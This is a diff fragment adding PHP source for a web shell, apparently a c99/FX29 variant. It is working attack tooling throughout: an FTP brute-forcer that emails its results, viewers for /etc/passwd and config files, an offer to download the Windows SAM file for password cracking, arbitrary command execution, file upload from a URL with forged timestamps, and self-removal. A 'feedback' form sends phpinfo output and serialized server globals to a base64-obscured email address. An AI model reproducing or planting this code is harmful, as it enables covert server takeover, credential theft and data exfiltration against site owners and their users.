+      $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
+      fclose($fqb_logfp);
+    }
+  }
+  else {
+    $logfile = $tmpdir_logs."fx29sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
+         "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
+         "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
+         "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
+         "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
+  }
+  echo "</td></tr></table></center>";
+}
+}
+if ($act == "d") {
+if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
+else {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win) {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
+}
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security") {
+  echo "<div class=barheader>.: Server Security Information :.</div>".
+       "<table>".
+       "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>";
+  echo "<td>Password File</td><td>";
+  if (!$win) {
+    if ($nixpasswd) {
+      if ($nixpasswd == 1) {$nixpasswd = 0;}
+      echo "*nix /etc/passwd:<br>";
+      if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+      if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+      echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+      $i = $nixpwd_s;
+      while ($i < $nixpwd_e) {
+        $uid = posix_getpwuid($i);
+        if ($uid) {
+          $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+          echo join(":",$uid)."<br>";
+        }
+        $i++;
+      }
+    }
+    else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a>";}
+  }
+  else {
+    $v = $_SERVER["WINDIR"]."\repair\sam";
+    if (file_get_contents($v)) {echo "<td colspan=2><div class=fxerrmsg>You can't crack Windows passwords(".$v.")</div></td></tr>"; }
+    else {echo "You can crack Windows passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";}
+  }
+  echo "</td></tr>";
+  echo "<tr><td>Config Files</td><td>";
+  if (!$win) {
+    $v = array(
+        array("User Domains","/etc/userdomains"),
+        array("Cpanel Config","/var/cpanel/accounting.log"),
+        array("Apache Config","/usr/local/apache/conf/httpd.conf"),
+        array("Apache Config","/etc/httpd.conf"),
+        array("Syslog Config","/etc/syslog.conf"),
+        array("Message of The Day","/etc/motd"),
+        array("Hosts","/etc/hosts")
+    );
+    $sep = "/";
+  }
+  else {
+    $windir = $_SERVER["WINDIR"];
+    $etcdir = $windir . "\system32\drivers\etc\\";
+    $v = array(
+        array("Hosts",$etcdir."hosts"),
+        array("Local Network Map",$etcdir."networks"),
+        array("LM Hosts",$etcdir."lmhosts.sam"),
+    );
+    $sep = "\\";
+  }
+  foreach ($v as $sec_arr) {
+    $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
+    $sec_d = rtrim($sec_arr[1],$sec_f);
+    $sec_full = $sec_d.$sec_f;
+    $sec_d = rtrim($sec_d,$sep);
+    if (file_get_contents($sec_full)) {
+      echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u><b>".$sec_arr[0]."</b></u></a> ] ";
+    }
+  }
+  echo "</td></tr>";
+
+  function displaysecinfo($name,$value) {
+    if (!empty($value)) {
+      echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>";
+    }
+  }
+  if (!$win) {
+    displaysecinfo("OS Version",myshellexec("cat /proc/version"));
+    displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version"));
+    displaysecinfo("Distrib Name",myshellexec("cat /etc/issue.net"));
+    displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/*-realise"));
+    displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo"));
+    displaysecinfo("RAM",myshellexec("free -m"));
+    displaysecinfo("HDD Space",myshellexec("df -h"));
+    displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+    displaysecinfo("Mount Options",myshellexec("cat /etc/fstab"));
+    displaysecinfo("cURL installed?",myshellexec("which curl"));
+    displaysecinfo("lynx installed?",myshellexec("which lynx"));
+    displaysecinfo("links installed?",myshellexec("which links"));
+    displaysecinfo("fetch installed?",myshellexec("which fetch"));
+    displaysecinfo("GET installed?",myshellexec("which GET"));
+    displaysecinfo("perl installed?",myshellexec("which perl"));
+    displaysecinfo("Where is Apache?",myshellexec("whereis apache"));
+    displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+    displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf"));
+    displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf"));
+    displaysecinfo("Locate my.conf",myshellexec("locate my.conf"));
+    displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf"));
+  }
+  else {
+    displaysecinfo("OS Version",myshellexec("ver"));
+    displaysecinfo("Account Settings",myshellexec("net accounts"));
+  }
+  echo "</table>\n";
+}
+if ($act == "mkfile") {
+if ($mkfile != $d) {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object already exists!";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied!";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+}
+else {$act = $dspact = "ls";}
+}
+if ($act == "encoder") {
+echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
+     "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
+     "<input type=hidden name=act value=encoder>".
+     "<center><table class=contents>".
+     "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
+     "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
+     "<input type=submit value=\"calculate\"></td></tr>".
+     "<tr><td rowspan=4>Hashes:</td>";
+foreach(array("md5","crypt","sha1","crc32") as $v) {
+  echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
+}
+echo "</tr>".
+     "<tr><td rowspan=2>Url:</td>".
+     "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
+     "<tr><td rowspan=2>Base64:</td>".
+     "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>base64_decode:</td><td>";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
+else {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
+  else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
+}
+echo "</td></tr>".
+     "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+$c = strlen($encoder_input);
+for($i=0;$i<$c;$i++) {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+}
+echo "\" readonly></td></tr></table></center></form>";
+}
+if ($act == "fsbuff") {
+  $arr_copy = $sess_data["copy"];
+  $arr_cut = $sess_data["cut"];
+  $arr = array_merge($arr_copy,$arr_cut);
+  if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
+  else {
+    $fx_infohead = "File-System Buffer";
+    $ls_arr = $arr;
+    $disp_fullpath = TRUE;
+    $act = "ls";
+  }
+}
+if ($act == "selfremove") {
+  if (($submit == $rndcode) and ($submit != "")) {
+    if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ".$sh_name."!"; c99shexit(); }
+    else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+  }
+  else {
+    if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
+    $rnd = rand(0,9).rand(0,9).rand(0,9);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+  }
+}
+if ($act == "update") { //Update c99Shell
+  $ret = c99sh_getupdate(!!$confirmupdate);
+  echo "<b>".$ret."</b>";
+  if (stristr($ret,"new version")) {
+    echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
+  }
+}
+if ($act == "feedback") {
+  $suppmail = base64_decode("ZmVlbGNvbXpAZ21haWwuY29t");
+  if (!empty($submit)){
+    $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+    $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+    if (!empty($fdbk_ref)) {
+      $tmp = @ob_get_contents();
+      ob_clean();
+      phpinfo();
+      $phpinfo = base64_encode(ob_get_contents());
+      ob_clean();
+      echo $tmp;
+      $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+    }
+    mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
+    echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=feedback>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br>".
+         "<input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked> Attach Server info (Recommended for bug-fix)<br>".
+         "*Language: English, Indonesian.</td></tr>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>";
+  }
+}
+if ($act == "fxmailer") {
+  if (!empty($submit)){
+    $headers = 'To: '.$dest_email."\r\n";
+    $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n";
+    if (mail($suppmail,$sender_subj,$sender_body,$header)) {
+      echo "<center><b>Email sent!</b></center>";
+    }
+    else { echo "<center><b>Couldn't send email!</b></center>"; }
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=fxmailer>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: $sh_name Mailer :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"sender_name\" value=\"".htmlspecialchars($sender_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"sender_email\" value=\"".htmlspecialchars($sender_email)."\"></td></tr>".
+         "<tr><td>To:</td><td><input type=\"text\" name=\"dest_email\" value=\"".htmlspecialchars($dest_email)."\"></td></tr>".
+         "<tr><td>Subject:</td><td><input size=70 type=\"text\" name=\"sender_subj\" value=\"".htmlspecialchars($sender_subj)."\"></td></tr>".
+         "<tr><td>Message:</td><td><textarea name=\"sender_body\" cols=80 rows=10>".htmlspecialchars($sender_body)."</textarea><br>".
+         "<tr><td></td><td><input type=\"submit\" name=\"submit\" value=\"Send\"></form></td></tr>".
+         "</table>";
+  }
+}
+if ($act == "search") {
+  echo "<div class=barheader>.: $sh_name File-System Search :.</div>";
+  if (empty($search_in)) {$search_in = $d;}
+  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+  if (!empty($submit)) {
+    $found = array();
+    $found_d = 0;
+    $found_f = 0;
+    $search_i_f = 0;
+    $search_i_d = 0;
+    $a = array(
+        "name"=>$search_name,
+        "name_regexp"=>$search_name_regexp,
+        "text"=>$search_text,
+        "text_regexp"=>$search_text_regxp,
+        "text_wwo"=>$search_text_wwo,
+        "text_cs"=>$search_text_cs,
+        "text_not"=>$search_text_not
+    );
+    $searchtime = getmicrotime();
+    $in = array_unique(explode(";",$search_in));
+    foreach($in as $v) {c99fsearch($v);}
+    $searchtime = round(getmicrotime()-$searchtime,4);
+    if (count($found) == 0) {echo "No files found!";}
+    else {
+      $ls_arr = $found;
+      $disp_fullpath = TRUE;
+      $act = "ls";
+    }
+  }
+  echo "<table class=contents>".
+       "<tr><td><form method=POST>".
+       "<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">".
+       "File or folder Name:</td><td><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - Regular Expression</td></tr>".
+       "<tr><td>Look in (Separate by \";\"):</td><td><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"></td></tr>".
+       "<tr><td>A word or phrase in the file:</td><td><textarea name=\"search_text\" cols=\"50\" rows=\"5\">".htmlspecialchars($search_text)."</textarea></td></tr>".
+       "<tr><td></td><td><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> Regular Expression".
+       "  <input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> Whole words only".
+       "  <input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> Case sensitive".
+       "  <input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> Find files NOT containing the text</td></tr>".
+       "<tr><td></td><td><input type=submit name=submit value=\"Search\"></form></td></tr>".
+       "</table>";
+  if ($act == "ls") {
+    $dspact = $act;
+    echo "Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>".
+         "<hr size=\"1\" noshade>";
+  }
+}
+if ($act == "chmod") {
+  $mode = fileperms($d.$f);
+  if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+  else {
+    $form = TRUE;
+    if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+}
+}
+if ($act == "upload") {
+  $uploadmess = "";
+  $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+  if (empty($uploadpath)) {$uploadpath = $d;}
+  elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
+  if (!empty($submit)) {
+    global $_FILES;
+    $uploadfile = $_FILES["uploadfile"];
+    if (!empty($uploadfile["tmp_name"])) {
+      if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+      else {$destin = $userfilename;}
+      if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
+        $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
+      }
+      else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
+    }
+    elseif (!empty($uploadurl)) {
+      if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+      else {
+        $destin = explode("/",$destin);
+        $destin = $destin[count($destin)-1];
+        if (empty($destin)) {
+          $i = 0;
+          $b = "";
+          while(file_exists($uploadpath.$destin)) {
+            if ($i > 0) {$b = "_".$i;}
+            $destin = "upload".$b;
+            $i++;
+          }
+        }
+      }
+      if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorrect URL!</b>";}
+      else {
+        $st = getmicrotime();
+        $content = @file_get_contents($uploadurl);
+        $dt = round(getmicrotime()-$st,4);
+        if (!$content) {$uploadmess .=  "Can't download file!";}
+        else {
+          if ($filestealth) {$stat = stat($uploadpath.$destin);}
+          $fp = fopen($uploadpath.$destin,"w");
+          if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+          else {
+            fwrite($fp,$content,strlen($content));
+            fclose($fp);
+            if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+            $uploadmess .= "File saved from ".$uploadurl." !";
+          }
+        }
+      }
+    }
+    else { echo "No file to upload!"; }
+  }
+  if ($miniform) {
+    echo "<b>".$uploadmess."</b>";
+    $act = "ls";
+  }
+  else {
+    echo "<table><tr><td colspan=2 class=barheader>".
+         ".: File Upload :.</td>".
+         "<td colspan=2>".$uploadmess."</td></tr>".
+         "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>".
+         "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
+         "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
+         "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
+         "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
+         "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
+         "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
+         "</form></td></tr></table>";
+  }
+}
+if ($act == "delete") {
+  $delerr = "";
+  foreach ($actbox as $v) {
+    $result = FALSE;
+    $result = fs_rmobj($v);
+    if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  }
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+  $act = "ls";
+}
+if (!$usefsbuff) {
+  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";}
+}
+else {
+  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+  elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+  elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    c99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+  elseif ($actarcbuff) {
+    $arcerr = "";
+    if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+    else {$ext = ".tar.gz";}
+    if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+    $cmdline .= " ".$actarcbuff_path;
+    $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+    foreach($objects as $v) {
+      $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+      if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+      if (is_dir($v)) {
+        if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+        $v .= "*";
+      }
+      $cmdline .= " ".$v;
+    }
+    $tmp = realpath(".");
+    chdir($d);
+    $ret = myshellexec($cmdline);
+    chdir($tmp);
+    if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+    $ret = str_replace("\r\n","\n",$ret);
+    $ret = explode("\n",$ret);
+    if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+    foreach($sess_data["cut"] as $k=>$v) {
+      if (in_array($v,$ret)) {fs_rmobj($v);}
+      unset($sess_data["cut"][$k]);
+    }
+    c99_sess_put($sess_data);
+    if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+    $act = "ls";
+  }
+  elseif ($actpastebuff) {
+    $psterr = "";
+    foreach($sess_data["copy"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+      if ($copy_unset) {unset($sess_data["copy"][$k]);}
+    }
+    foreach($sess_data["cut"] as $k=>$v) {
+      $to = $d.basename($v);
+      if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+      unset($sess_data["cut"][$k]);
+    }
+    c99_sess_put($sess_data);
+    if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+    $act = "ls";
+  }
+}
+if ($act == "cmd") {
+  @chdir($chdir);
+  if (!empty($submit)) {
+    echo "<div class=barheader>.: Result of Command Execution :.</div>";
+    $olddir = realpath(".");
+    @chdir($d);
+    $ret = myshellexec($cmd);
+    $ret = convert_cyr_string($ret,"d","w");
+    if ($cmd_txt) {
+      $rows = count(explode("\r\n",$ret))+1;
+      if ($rows < 10) {$rows = 10; }
+      if ($msie) { $cols = 113; }
+      else { $cols = 117;}
+      //echo "<textarea cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>";
+      echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
+    }
+    else {echo $ret."<br>";}
+    @chdir($olddir);
+  }
+  else {
+    echo "<b>Command Execution</b>";
+    if (empty($cmd_txt)) {$cmd_txt = TRUE;}
+  }
+}
+if ($act == "ls") {
+  if (count($ls_arr) > 0) { $list = $ls_arr; }
+  else {
+    $list = array();
+    if ($h = @opendir($d)) {
+      while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+      closedir($h);
+    }
+  }
+  if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
+  else {
+    $objects = array();
+    $vd = "f"; //Viewing mode
+    if ($vd == "f") {
+      $objects["head"] = array();
+      $objects["folders"] = array();
+      $objects["links"] = array();
+      $objects["files"] = array();
+      foreach ($list as $v) {
+        $o = basename($v);
+        $row = array();
+        if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
+        elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
+        elseif (is_dir($v)) {
+          if (is_link($v)) {$type = "LINK";}
+          else {$type = "DIR";}
+          $row[] = $v;
+          $row[] = $type;
+        }
+        elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+        $row[] = filemtime($v);
+        if (!$win) {
+          $ow = posix_getpwuid(fileowner($v));
+          $gr = posix_getgrgid(filegroup($v));
+          $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+        }
+        $row[] = fileperms($v);
+        if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+        elseif (is_link($v)) {$objects["links"][] = $row;}
